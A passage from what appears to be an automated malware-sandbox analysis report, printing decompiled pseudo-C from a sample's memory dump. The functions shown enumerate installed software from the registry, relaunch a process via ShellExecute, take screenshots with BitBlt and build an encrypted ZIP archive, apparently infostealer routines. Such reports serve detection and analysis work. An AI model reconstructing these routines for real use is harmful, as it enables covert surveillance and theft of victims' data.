					}
					L2:
					 *(_t109 - 0x818) = 0x400;
					_t56 = RegEnumKeyExA( *(_t109 - 0x810),  *(_t109 - 0x31960), _t109 - 0x408, _t109 - 0x818, 0, 0, 0, 0); // executed
					 *(_t109 - 0x814) = _t56;
					if( *(_t109 - 0x814) != 0) {
						L13:
						continue;
					} else {
						L3:
						wsprintfA(_t109 - 0x808, "%s\\%s",  *((intOrPtr*)(_t109 - 0x3195c)), _t109 - 0x408);
						_t60 = RegOpenKeyExA(0x80000002, _t109 - 0x808, 0, 0x20019, _t109 - 0x80c); // executed
						if(_t60 == 0) {
							L5:
							 *(_t109 - 0x818) = 0x400;
							_t87 =  *0x432678; // 0x2336ba8
							_t62 = RegQueryValueExA( *(_t109 - 0x80c), _t87, 0, _t109 - 4, _t109 - 0xc18, _t109 - 0x818); // executed
							if(_t62 == 0) {
								L6:
								 *((intOrPtr*)(_t109 - 0x31964)) = _t109 - 0xc18;
								 *((intOrPtr*)(_t109 - 0x31968)) =  *((intOrPtr*)(_t109 - 0x31964)) + 1;
								do {
									L7:
									 *((char*)(_t109 - 0x31969)) =  *((intOrPtr*)( *((intOrPtr*)(_t109 - 0x31964))));
									 *((intOrPtr*)(_t109 - 0x31964)) =  *((intOrPtr*)(_t109 - 0x31964)) + 1;
								} while ( *((char*)(_t109 - 0x31969)) != 0);
								 *((intOrPtr*)(_t109 - 0x31970)) =  *((intOrPtr*)(_t109 - 0x31964)) -  *((intOrPtr*)(_t109 - 0x31968));
								if( *((intOrPtr*)(_t109 - 0x31970)) > 1) {
									L9:
									 *0x4328c4(_t109 - 0x31958, _t109 - 0xc18);
									 *(_t109 - 0x818) = 0x400;
									_t94 =  *0x432418; // 0x2336bf0
									_t69 = RegQueryValueExA( *(_t109 - 0x80c), _t94, 0, _t109 - 4, _t109 - 0xc18, _t109 - 0x818); // executed
									if(_t69 == 0) {
										 *0x4328c4(_t109 - 0x31958, " ");
										 *0x4328c4(_t109 - 0x31958, _t109 - 0xc18);
									}
									L11:
									 *0x4328c4(_t109 - 0x31958, "\n");
								}
							}
							L12:
							RegCloseKey( *(_t109 - 0x80c));
							goto L13;
						} else {
							L4:
							_t96 =  *(_t109 - 0x80c);
							RegCloseKey( *(_t109 - 0x80c));
							RegCloseKey( *(_t109 - 0x810));
							_t53 = _t109 - 0x31958;
						}
					}
					L15:
					return E00404354(_t53, _t78,  *(_t109 - 8) ^ _t109, _t96, _t107, _t108);
					L16:
				}
				L14:
				_t96 =  *(_t109 - 0x810);
				RegCloseKey( *(_t109 - 0x810));
				_t53 = _t109 - 0x31958;
				goto L15;
			}














                                                                                                                              0x0041ad33
                                                                                                                              0x0041ad33
                                                                                                                              0x0041ad33
                                                                                                                              0x0041ad3c
                                                                                                                              0x0041ad49
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041ad4f
                                                                                                                              0x0041ad4f
                                                                                                                              0x0041ad7d
                                                                                                                              0x0041ad83
                                                                                                                              0x0041ad90
                                                                                                                              0x0041af23
                                                                                                                              0x00000000
                                                                                                                              0x0041ad96
                                                                                                                              0x0041ad96
                                                                                                                              0x0041adb0
                                                                                                                              0x0041add3
                                                                                                                              0x0041addb
                                                                                                                              0x0041ae02
                                                                                                                              0x0041ae02
                                                                                                                              0x0041ae20
                                                                                                                              0x0041ae2e
                                                                                                                              0x0041ae36
                                                                                                                              0x0041ae3c
                                                                                                                              0x0041ae42
                                                                                                                              0x0041ae51
                                                                                                                              0x0041ae57
                                                                                                                              0x0041ae57
                                                                                                                              0x0041ae5f
                                                                                                                              0x0041ae65
                                                                                                                              0x0041ae6c
                                                                                                                              0x0041ae81
                                                                                                                              0x0041ae8e
                                                                                                                              0x0041ae94
                                                                                                                              0x0041aea2
                                                                                                                              0x0041aea8
                                                                                                                              0x0041aec6
                                                                                                                              0x0041aed4
                                                                                                                              0x0041aedc
                                                                                                                              0x0041aeea
                                                                                                                              0x0041aefe
                                                                                                                              0x0041aefe
                                                                                                                              0x0041af04
                                                                                                                              0x0041af10
                                                                                                                              0x0041af10
                                                                                                                              0x0041ae8e
                                                                                                                              0x0041af16
                                                                                                                              0x0041af1d
                                                                                                                              0x00000000
                                                                                                                              0x0041addd
                                                                                                                              0x0041addd
                                                                                                                              0x0041addd
                                                                                                                              0x0041ade4
                                                                                                                              0x0041adf1
                                                                                                                              0x0041adf7
                                                                                                                              0x0041adf7
                                                                                                                              0x0041addb
                                                                                                                              0x0041af3b
                                                                                                                              0x0041af48
                                                                                                                              0x00000000
                                                                                                                              0x0041af48
                                                                                                                              0x0041af28
                                                                                                                              0x0041af28
                                                                                                                              0x0041af2f
                                                                                                                              0x0041af35
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • RegEnumKeyExA.KERNEL32(00000000,?,?,00000400,00000000,00000000,00000000,00000000), ref: 0041AD7D
                                                                                                                              • wsprintfA.USER32 ref: 0041ADB0
                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020019,?), ref: 0041ADD3
                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0041ADE4
                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0041ADF1
                                                                                                                              • RegQueryValueExA.KERNEL32(?,02336BA8,00000000,000F003F,?,00000400), ref: 0041AE2E
                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 0041AEA2
                                                                                                                              • RegQueryValueExA.KERNEL32(?,02336BF0,00000000,000F003F,?,00000400), ref: 0041AED4
                                                                                                                              • lstrcat.KERNEL32(?,00429B9C), ref: 0041AEEA
                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 0041AEFE
                                                                                                                              • lstrcat.KERNEL32(?,00429BA0), ref: 0041AF10
                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0041AF1D
                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0041AF2F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Closelstrcat$QueryValue$EnumOpenwsprintf
                                                                                                                              • String ID: %s\%s
                                                                                                                              • API String ID: 1306442838-4073750446
                                                                                                                              • Opcode ID: 7e3b1e9eaef633de3c84d7d642d6c35276b624b8e4ffca11b8f592e78514d2a3
                                                                                                                              • Instruction ID: f3428a77bd91617219cae783505e27cb4c8bfcd2f017827be334a9b1ae9db7bc
                                                                                                                              • Opcode Fuzzy Hash: 7e3b1e9eaef633de3c84d7d642d6c35276b624b8e4ffca11b8f592e78514d2a3
                                                                                                                              • Instruction Fuzzy Hash: 66214DB490122C9BDB64DB50DC85BE9B3BCFF48304F0491EAA24966180DB745AC5CFA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041A720, Relevance: 10.6, APIs: 7, Instructions: 53COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 90%
                                                                                                                              			E0041A720(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				char _v276;
				char _v540;
				signed int _t10;
				void* _t16;
				long _t17;
				CHAR* _t18;
				void* _t22;
				char* _t32;
				signed int _t35;

				_t10 =  *0x4301f4; // 0xe687535
				_v8 = _t10 ^ _t35;
				E004091C0( &_v276, 0, 0x104);
				E004091C0( &_v540, 0, 0x104);
				_push(_a4);
				_t16 = E0041A600(GetCurrentProcessId()); // executed
				_t17 = GetCurrentProcessId();
				_t18 =  *0x4322cc; // 0x23374e0
				wsprintfA( &_v276, _t18, _t17);
				GetCurrentDirectoryA(0x104,  &_v540);
				_t32 =  *0x432634; // 0x2337218
				_t22 = ShellExecuteA(0, 0, _t32,  &_v276,  &_v540, 0); // executed
				return E00404354(_t22, __ebx, _v8 ^ _t35, _t32, __edi, __esi, _t16);
			}













                                                                                                                              0x0041a729
                                                                                                                              0x0041a730
                                                                                                                              0x0041a741
                                                                                                                              0x0041a757
                                                                                                                              0x0041a762
                                                                                                                              0x0041a76a
                                                                                                                              0x0041a773
                                                                                                                              0x0041a77a
                                                                                                                              0x0041a787
                                                                                                                              0x0041a79c
                                                                                                                              0x0041a7b2
                                                                                                                              0x0041a7bd
                                                                                                                              0x0041a7d0

                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 0041A741
                                                                                                                              • _memset.LIBCMT ref: 0041A757
                                                                                                                              • GetCurrentProcessId.KERNEL32(?), ref: 0041A763
                                                                                                                                • Part of subcall function 0041A600: OpenProcess.KERNEL32(00000410,00000000,?), ref: 0041A61E
                                                                                                                                • Part of subcall function 0041A600: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0041A63F
                                                                                                                                • Part of subcall function 0041A600: CloseHandle.KERNEL32(00000000), ref: 0041A649
                                                                                                                              • GetCurrentProcessId.KERNEL32(00000000), ref: 0041A773
                                                                                                                              • wsprintfA.USER32 ref: 0041A787
                                                                                                                              • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0041A79C
                                                                                                                              • ShellExecuteA.SHELL32(00000000,00000000,02337218,?,?,00000000), ref: 0041A7BD
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CurrentProcess$_memset$CloseDirectoryExecuteFileHandleModuleNameOpenShellwsprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2405513257-0
                                                                                                                              • Opcode ID: baf83078a686ac06e6fc9f2a6dcaae8c194dc191c1c4b6f6066e0c50a55cede3
                                                                                                                              • Instruction ID: d69d9e76eef0e66095736d82ead0aa8f23bf222a92cc1a2a572ef11dcdc1f2d9
                                                                                                                              • Opcode Fuzzy Hash: baf83078a686ac06e6fc9f2a6dcaae8c194dc191c1c4b6f6066e0c50a55cede3
                                                                                                                              • Instruction Fuzzy Hash: BD11CCF1940208ABD708EBA0DD8AFDA737CAB5C704F0002A8B705961D1DEB49A84CBA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041A940, Relevance: 10.5, APIs: 7, Instructions: 48windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E0041A940(int _a4, int _a8, int _a12, int _a16) {
				struct HDC__* _v8;
				struct HBITMAP__* _v12;
				void* _t26;
				void* _t36;

				_v8 = CreateCompatibleDC(0);
				_v12 = CreateCompatibleBitmap(GetDC(0), _a12, _a16);
				SelectObject(_v8, _v12);
				BitBlt(_v8, 0, 0, _a12, _a16, GetDC(0), _a4, _a8, 0xcc0020);
				E0041A7E0(_t26, _t36, _v12, 0x46); // executed
				return DeleteObject(_v12);
			}







                                                                                                                              0x0041a94e
                                                                                                                              0x0041a968
                                                                                                                              0x0041a973
                                                                                                                              0x0041a99f
                                                                                                                              0x0041a9ab
                                                                                                                              0x0041a9c0

                                                                                                                              APIs
                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 0041A948
                                                                                                                              • GetDC.USER32(00000000), ref: 0041A95B
                                                                                                                              • CreateCompatibleBitmap.GDI32(00000000), ref: 0041A962
                                                                                                                              • SelectObject.GDI32(?,?), ref: 0041A973
                                                                                                                              • GetDC.USER32(00000000), ref: 0041A988
                                                                                                                              • BitBlt.GDI32(?,00000000,00000000,?,?,00000000), ref: 0041A99F
                                                                                                                              • DeleteObject.GDI32(?), ref: 0041A9B7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CompatibleCreateObject$BitmapDeleteSelect
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2649417129-0
                                                                                                                              • Opcode ID: 8da025cf27b9162b199af851bde644c4301ccdb8fd0549fef43d9250407ed98f
                                                                                                                              • Instruction ID: 221383f7ee6d196ab81c3e677e1672781a4a52126109af141504c3ea2f6f6f90
                                                                                                                              • Opcode Fuzzy Hash: 8da025cf27b9162b199af851bde644c4301ccdb8fd0549fef43d9250407ed98f
                                                                                                                              • Instruction Fuzzy Hash: 8F010CB6A40208BFDB44DFE4ED49F9E7BB8FB4C701F108158FA09D7280D6B1A9108B65
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004188D0, Relevance: 9.4, APIs: 3, Strings: 2, Instructions: 694COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 96%
                                                                                                                              			E004188D0(void* __ebx, signed int* __ecx, void* __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				char _v13;
				char _v24;
				signed int _v28;
				signed int _v32;
				signed int _v33;
				signed int _v34;
				char _v48;
				char _v316;
				signed int _v320;
				signed int _v321;
				signed int _v328;
				void* _v332;
				char _v336;
				char _v337;
				char _v338;
				char _v339;
				char _v340;
				char _v341;
				char _v342;
				char _v343;
				char _v344;
				char _v345;
				char _v346;
				char _v347;
				char _v348;
				char _v349;
				char _v350;
				char _v351;
				char _v352;
				signed int _v360;
				signed int _v364;
				signed int _v372;
				char _v632;
				char _v892;
				signed int _v896;
				signed int _v900;
				signed int _v904;
				char _v1164;
				intOrPtr _v1168;
				signed int _v1172;
				short _v1176;
				short _v1178;
				short _v1180;
				signed int _v1184;
				signed int _v1188;
				signed int _v1192;
				signed int _v1196;
				signed int _v1200;
				signed int _v1204;
				signed int _v1208;
				unsigned int _v1212;
				signed int _v1214;
				signed int _v1216;
				short _v1218;
				char _v1220;
				signed int _v1224;
				signed int _v1228;
				signed char* _v1232;
				signed int _v1236;
				signed int _v1240;
				signed int _v1244;
				signed int _v1248;
				void* _v1252;
				signed int* _v1256;
				signed int _v1260;
				char* _v1264;
				intOrPtr _v1268;
				char _v1269;
				intOrPtr* _v1276;
				signed int _v1280;
				char _v1281;
				intOrPtr _v1288;
				signed int _v1292;
				intOrPtr* _v1296;
				char* _v1300;
				intOrPtr _v1304;
				char _v1305;
				intOrPtr* _v1312;
				signed int _v1316;
				char _v1317;
				signed int _v1324;
				signed int _v1328;
				char _v1329;
				signed int _v1336;
				signed int _v1340;
				void* __edi;
				void* __esi;
				signed int _t417;
				signed int _t429;
				char _t432;
				signed int _t466;
				signed int _t469;
				signed int* _t472;
				signed char _t503;
				signed int _t505;
				signed char _t507;
				signed int _t510;
				signed char _t516;
				signed int _t518;
				signed int _t522;
				signed int _t523;
				signed int _t536;
				signed int _t540;
				signed char _t541;
				signed int _t544;
				void* _t548;
				signed int* _t550;
				char _t567;
				intOrPtr* _t589;
				signed int* _t604;
				signed int _t612;
				signed int _t623;
				signed int _t630;
				signed int _t636;
				signed int* _t640;
				intOrPtr _t649;
				signed int _t662;
				signed int _t707;
				signed int _t720;
				signed int _t725;
				intOrPtr _t726;
				signed int _t736;
				void* _t737;
				void* _t738;

				_t548 = __ebx;
				_t417 =  *0x4301f4; // 0xe687535
				_v12 = _t417 ^ _t736;
				_v1256 = __ecx;
				if(_v1256[5] == 0) {
					_t550 = _v1256;
					__eflags =  *(_t550 + 0x2c) & 0x000000ff;
					if(( *(_t550 + 0x2c) & 0x000000ff) == 0) {
						_v328 = 0;
						__eflags =  *_v1256;
						if( *_v1256 != 0) {
							__eflags = _a16 - 4;
							if(_a16 != 4) {
								_v328 = 0xc;
							}
						}
						_v1260 = _a4;
						_v1264 =  &_v316;
						_v1268 = _v1264;
						do {
							_v1269 =  *_v1260;
							 *_v1264 = _v1269;
							_t656 = _v1260 + 1;
							_v1260 = _v1260 + 1;
							_v1264 = _v1264 + 1;
							__eflags = _v1269;
						} while (_v1269 != 0);
						__eflags = _v316;
						if(_v316 != 0) {
							_t656 =  &_v316;
							_v1228 =  &_v316;
							while(1) {
								__eflags =  *_v1228;
								if( *_v1228 == 0) {
									break;
								}
								__eflags =  *_v1228 - 0x5c;
								if( *_v1228 == 0x5c) {
									 *_v1228 = 0x2f;
								}
								_t656 = _v1228 + 1;
								_v1228 = _v1228 + 1;
							}
							__eflags = _a16 - 4;
							_v33 = 0 | _a16 == 0x00000004;
							__eflags = _v33 & 0x000000ff;
							if((_v33 & 0x000000ff) == 0) {
								L21:
								_v1292 = 0;
								L22:
								_v34 = _v1292;
								_v32 = 8;
								__eflags = _v33 & 0x000000ff;
								if((_v33 & 0x000000ff) != 0) {
									L24:
									_v32 = 0;
									L25:
									__eflags = _a16 - 2;
									if(_a16 != 2) {
										__eflags = _a16 - 1;
										if(_a16 != 1) {
											__eflags = _a16 - 3;
											if(_a16 != 3) {
												__eflags = _a16 - 4;
												if(__eflags != 0) {
													_t429 = 0x10000;
													L118:
													return E00404354(_t429, _t548, _v12 ^ _t736, _t656, _t731, _t734);
												}
												_v28 = E00414B50(_t548, _v1256, _t731, _t734, __eflags);
												L34:
												__eflags = _v28;
												if(_v28 == 0) {
													_v360 = 0;
													_t432 =  *0x4292cf; // 0x0
													_v1164 = _t432;
													_v1296 =  &_v316;
													_v1300 =  &_v892;
													_v1304 = _v1300;
													do {
														_v1305 =  *_v1296;
														 *_v1300 = _v1305;
														_v1296 = _v1296 + 1;
														_v1300 = _v1300 + 1;
														__eflags = _v1305;
													} while (_v1305 != 0);
													_v1312 =  &_v892;
													_t662 = _v1312 + 1;
													__eflags = _t662;
													_v1316 = _t662;
													do {
														_v1317 =  *_v1312;
														_v1312 = _v1312 + 1;
														__eflags = _v1317;
													} while (_v1317 != 0);
													_v1324 = _v1312 - _v1316;
													_v1196 = _v1324;
													__eflags = _v34 & 0x000000ff;
													if((_v34 & 0x000000ff) == 0) {
														L44:
														_t567 =  *0x4293ad; // 0x0
														_v632 = _t567;
														_v904 = 0;
														_v1192 = 0;
														_v900 = 0;
														_v1188 = 0;
														_v896 = 0;
														_v1184 = 0;
														_v372 = 1;
														_v364 = 0;
														_v1178 = 0;
														_v1220 = 0xb17;
														_v1218 = 0x14;
														_v1212 = _v1256[0x1a];
														_v1208 = 0;
														_v1216 = 8;
														__eflags =  *_v1256;
														if( *_v1256 != 0) {
															__eflags = _v33 & 0x000000ff;
															if((_v33 & 0x000000ff) == 0) {
																_v1216 = 9;
															}
														}
														_v1176 = _v1216;
														_v1214 = _v32;
														__eflags = _v32;
														if(_v32 != 0) {
															L50:
															_v1336 = 0;
															goto L51;
														} else {
															_t640 = _v1256;
															__eflags =  *(_t640 + 0x70);
															if( *(_t640 + 0x70) < 0) {
																goto L50;
															}
															_v1336 = _v1256[0x1c] + _v328;
															L51:
															_v1204 = _v1336;
															_v1200 = _v1256[0x1c];
															_v1180 = 0;
															_v1172 = _v1256[0x13];
															_v1168 = _v1256[6] + _v1256[4];
															_v904 =  &_v352;
															_v1192 = 0x11;
															_v900 =  &_v48;
															_v1188 = 9;
															_v352 = 0x55;
															_v351 = 0x54;
															_v350 = 0xd;
															_v349 = 0;
															_v348 = 7;
															_v347 = _v1256[0x16];
															_v346 = E00425690(_v1256[0x16], 8, _v1256[0x17]);
															_v345 = E00425690(_v1256[0x16], 0x10, _v1256[0x17]);
															_v344 = E00425690(_v1256[0x16], 0x18, _v1256[0x17]);
															_v343 = _v1256[0x14];
															_v342 = E00425690(_v1256[0x14], 8, _v1256[0x15]);
															_v341 = E00425690(_v1256[0x14], 0x10, _v1256[0x15]);
															_v340 = E00425690(_v1256[0x14], 0x18, _v1256[0x15]);
															_v339 = _v1256[0x18];
															_v338 = E00425690(_v1256[0x18], 8, _v1256[0x19]);
															_v337 = E00425690(_v1256[0x18], 0x10, _v1256[0x19]);
															_v336 = E00425690(_v1256[0x18], 0x18, _v1256[0x19]);
															_t466 = _v904;
															_t589 = _v900;
															 *_t589 =  *_t466;
															 *((intOrPtr*)(_t589 + 4)) =  *((intOrPtr*)(_t466 + 4));
															 *((char*)(_t589 + 8)) =  *((intOrPtr*)(_t466 + 8));
															 *((char*)(_v900 + 2)) = 5;
															_t656 = _v1256;
															_t469 = E00413C90( &_v1220, E00417110, _v1256); // executed
															_t738 = _t737 + 0xc;
															_v1224 = _t469;
															__eflags = _v1224;
															if(_v1224 == 0) {
																_t656 = _v1256;
																_v1256[6] = _v1196 + _v1192 + 0x1e + _v1256[6];
																_t472 = _v1256;
																__eflags =  *(_t472 + 0x14);
																if( *(_t472 + 0x14) == 0) {
																	_v1256[0xc] = 0x12345678;
																	_v1256[0xd] = 0x23456789;
																	_v1256[0xe] = 0x34567890;
																	_v1232 =  *_v1256;
																	while(1) {
																		__eflags = _v1232;
																		if(_v1232 == 0) {
																			break;
																		}
																		__eflags =  *_v1232;
																		if( *_v1232 == 0) {
																			break;
																		}
																		E00412FE0( &(_v1256[0xc]),  *_v1232 & 0x000000ff);
																		_t738 = _t738 + 8;
																		_t636 =  &(_v1232[1]);
																		__eflags = _t636;
																		_v1232 = _t636;
																	}
																	__eflags =  *0x432aac & 0x000000ff;
																	if(( *0x432aac & 0x000000ff) == 0) {
																		_t522 = GetTickCount();
																		_t523 = GetDesktopWindow();
																		_t734 = _t522 ^ _t523;
																		__eflags = _t522 ^ _t523;
																		E00406DA4(_t522 ^ _t523);
																		_t738 = _t738 + 4;
																	}
																	_v1236 = 0;
																	while(1) {
																		__eflags = _v1236 - 0xc;
																		if(__eflags >= 0) {
																			break;
																		}
																		 *((char*)(_t736 + _v1236 - 0x14)) = E00406DB6(__eflags) >> 0x00000007 & 0x000000ff;
																		_t720 = _v1236 + 1;
																		__eflags = _t720;
																		_v1236 = _t720;
																	}
																	_v13 = _v1212 >> 0x00000008 & 0x000000ff;
																	_v1240 = 0;
																	while(1) {
																		__eflags = _v1240 - 0xc;
																		if(__eflags >= 0) {
																			break;
																		}
																		_t516 = E00415150(_v1240, __eflags,  &(_v1256[0xc]),  *(_t736 + _v1240 - 0x14) & 0x000000ff);
																		_t738 = _t738 + 8;
																		 *(_t736 + _v1240 - 0x14) = _t516;
																		_t518 = _v1240 + 1;
																		__eflags = _t518;
																		_v1240 = _t518;
																	}
																	__eflags =  *_v1256;
																	if( *_v1256 != 0) {
																		__eflags = _v33 & 0x000000ff;
																		if((_v33 & 0x000000ff) == 0) {
																			E00417110( &_v24, _v1256,  &_v24, 0xc);
																			_t738 = _t738 + 0xc;
																			_t630 = _v1256[6] + 0xc;
																			__eflags = _t630;
																			_v1256[6] = _t630;
																		}
																	}
																	_v8 = 0;
																	__eflags =  *_v1256;
																	if( *_v1256 == 0) {
																		L76:
																		_v1340 = 0;
																		goto L77;
																	} else {
																		__eflags = _v33 & 0x000000ff;
																		if((_v33 & 0x000000ff) != 0) {
																			goto L76;
																		}
																		_v1340 = 1;
																		L77:
																		_v1256[0xb] = _v1340;
																		__eflags = _v33 & 0x000000ff;
																		if((_v33 & 0x000000ff) != 0) {
																			L80:
																			__eflags = _v33 & 0x000000ff;
																			if((_v33 & 0x000000ff) != 0) {
																				L83:
																				__eflags = _v33 & 0x000000ff;
																				if((_v33 & 0x000000ff) != 0) {
																					_v1256[0x24] = 0;
																				}
																				L85:
																				_v1256[0xb] = 0;
																				E00412B90(_v1256);
																				_v1256[6] = _v1256[6] + _v1256[0x24];
																				_t656 = _v1256;
																				__eflags =  *(_t656 + 0x14);
																				if( *(_t656 + 0x14) == 0) {
																					__eflags = _v8;
																					if(_v8 == 0) {
																						__eflags = _v1204 - _v1256[0x24] + _v328;
																						_v321 = 0 | _v1204 == _v1256[0x24] + _v328;
																						_v1208 = _v1256[0x1e];
																						_v1204 = _v1256[0x24] + _v328;
																						_v1200 = _v1256[0x1c];
																						_t604 = _v1256;
																						__eflags =  *(_t604 + 0x1c) & 0x000000ff;
																						if(( *(_t604 + 0x1c) & 0x000000ff) == 0) {
																							L101:
																							_t656 = _v1214 & 0x0000ffff;
																							__eflags = (_v1214 & 0x0000ffff) - (_v32 & 0x0000ffff);
																							if((_v1214 & 0x0000ffff) == (_v32 & 0x0000ffff)) {
																								__eflags = _v32;
																								if(_v32 != 0) {
																									L106:
																									_t656 = _v1256;
																									_v1224 = E00413AA0( &_v1220, E00417110, _v1256);
																									__eflags = _v1224;
																									if(_v1224 == 0) {
																										_t707 = _v1256[6] + 0x10;
																										__eflags = _t707;
																										_v1256[6] = _t707;
																										_v1216 = _v1176;
																										L109:
																										_t656 = _v1256;
																										__eflags = _v1256[5];
																										if(__eflags == 0) {
																											_v1248 = E00404E60(_t731, _t734, __eflags, _v1188);
																											_v320 = _v1248;
																											E00409240(_v320, _v900, _v1188);
																											_v900 = _v320;
																											_v1252 = E00404E60(_t731, _t734, __eflags, 0x360);
																											_v332 = _v1252;
																											_t734 =  &_v1220;
																											memcpy(_v332, _t734, 0xd8 << 2);
																											_t731 = _t734 + 0x1b0;
																											_t656 = _v1256;
																											__eflags =  *(_t656 + 0x44);
																											if( *(_t656 + 0x44) != 0) {
																												_v1244 = _v1256[0x11];
																												while(1) {
																													_t612 = _v1244;
																													__eflags =  *(_t612 + 0x35c);
																													if( *(_t612 + 0x35c) == 0) {
																														break;
																													}
																													_v1244 =  *((intOrPtr*)(_v1244 + 0x35c));
																												}
																												_t656 = _v332;
																												 *((intOrPtr*)(_v1244 + 0x35c)) = _v332;
																												L117:
																												_t429 = 0;
																												__eflags = 0;
																												goto L118;
																											}
																											_v1256[0x11] = _v332;
																											goto L117;
																										}
																										_t429 = _v1256[5];
																										goto L118;
																									}
																									_t429 = 0x400;
																									goto L118;
																								}
																								__eflags = _v321 & 0x000000ff;
																								if((_v321 & 0x000000ff) != 0) {
																									goto L106;
																								}
																								_t429 = 0x4000000;
																								goto L118;
																							}
																							_t429 = 0x4000000;
																							goto L118;
																						}
																						__eflags =  *_v1256;
																						if( *_v1256 == 0) {
																							L92:
																							_v1214 = _v32;
																							__eflags = _v1216 & 1;
																							if((_v1216 & 1) == 0) {
																								_t623 = _v1216 & 0xfff7;
																								__eflags = _t623;
																								_v1216 = _t623;
																							}
																							_v1176 = _v1216;
																							_t503 = E00412C20(_v1256, _v1168 - _v1256[4]); // executed
																							_t656 = _t503 & 0x000000ff;
																							__eflags = _t503 & 0x000000ff;
																							if((_t503 & 0x000000ff) != 0) {
																								_t505 = E00413C90( &_v1220, E00417110, _v1256); // executed
																								_v1224 = _t505;
																								__eflags = _v1224;
																								if(_v1224 == 0) {
																									_t656 = _v1256;
																									_t507 = E00412C20(_v1256, _v1256[6]); // executed
																									__eflags = _t507 & 0x000000ff;
																									if((_t507 & 0x000000ff) != 0) {
																										goto L109;
																									}
																									_t429 = 0x2000000;
																									goto L118;
																								}
																								_t429 = 0x400;
																							} else {
																								_t429 = 0x2000000;
																							}
																							goto L118;
																						}
																						__eflags = _v33 & 0x000000ff;
																						if((_v33 & 0x000000ff) == 0) {
																							goto L101;
																						}
																						goto L92;
																					}
																					_t429 = 0x400;
																					goto L118;
																				}
																				_t429 = _v1256[5];
																				goto L118;
																			}
																			__eflags = _v32;
																			if(__eflags != 0) {
																				goto L83;
																			}
																			_v8 = E00417800(_v1256, _t731, _t734, __eflags);
																			goto L85;
																		}
																		__eflags = _v32 - 8;
																		if(_v32 != 8) {
																			goto L80;
																		}
																		_t510 = E00418760(_t548, _v1256, _t731, _t734,  &_v1220); // executed
																		_v8 = _t510;
																		goto L85;
																	}
																}
																E00412B90(_v1256);
																_t429 = _v1256[5];
																goto L118;
															}
															E00412B90(_v1256);
															_t429 = 0x400;
															goto L118;
														}
													}
													_t725 =  &_v892 + 0xffffffff;
													__eflags = _t725;
													_v1328 = _t725;
													do {
														_v1329 =  *((intOrPtr*)(_v1328 + 1));
														_v1328 = _v1328 + 1;
														__eflags = _v1329;
													} while (_v1329 != 0);
													_t731 = _v1328;
													_t726 =  *0x429b2c; // 0x2f
													 *_v1328 = _t726;
													_t536 = _v1196 + 1;
													__eflags = _t536;
													_v1196 = _t536;
													goto L44;
												}
												_t429 = _v28;
												goto L118;
											}
											_t656 = _a8;
											_v28 = E00414C60(_t548, _v1256, _t731, _t734, _a8, _a12);
											goto L34;
										}
										_t656 = _a12;
										_v28 = E00416D00(_t548, _v1256, _t731, _t734, _a8, _a12);
										goto L34;
									}
									_t540 = E00416EC0(_v1256, _a8); // executed
									_v28 = _t540;
									goto L34;
								}
								_t656 =  &_v316;
								_t541 = E00415000( &_v316);
								_t737 = _t737 + 4;
								__eflags = _t541 & 0x000000ff;
								if((_t541 & 0x000000ff) == 0) {
									goto L25;
								}
								goto L24;
							}
							_v1276 =  &_v316;
							_t544 = _v1276 + 1;
							__eflags = _t544;
							_v1280 = _t544;
							do {
								_v1281 =  *_v1276;
								_v1276 = _v1276 + 1;
								__eflags = _v1281;
							} while (_v1281 != 0);
							_v1288 = _v1276 - _v1280;
							_t649 = _v1288;
							_t656 =  *((char*)(_t736 + _t649 - 0x139));
							__eflags =  *((char*)(_t736 + _t649 - 0x139)) - 0x2f;
							if( *((char*)(_t736 + _t649 - 0x139)) == 0x2f) {
								goto L21;
							}
							_v1292 = 1;
							goto L22;
						}
						_t429 = 0x10000;
						goto L118;
					}
					_t429 = 0x50000;
					goto L118;
				}
				_t429 = 0x40000;
				goto L118;
			}

































































































































                                                                                                                              0x004188d0
                                                                                                                              0x004188d9
                                                                                                                              0x004188e0
                                                                                                                              0x004188e5
                                                                                                                              0x004188f5
                                                                                                                              0x00418901
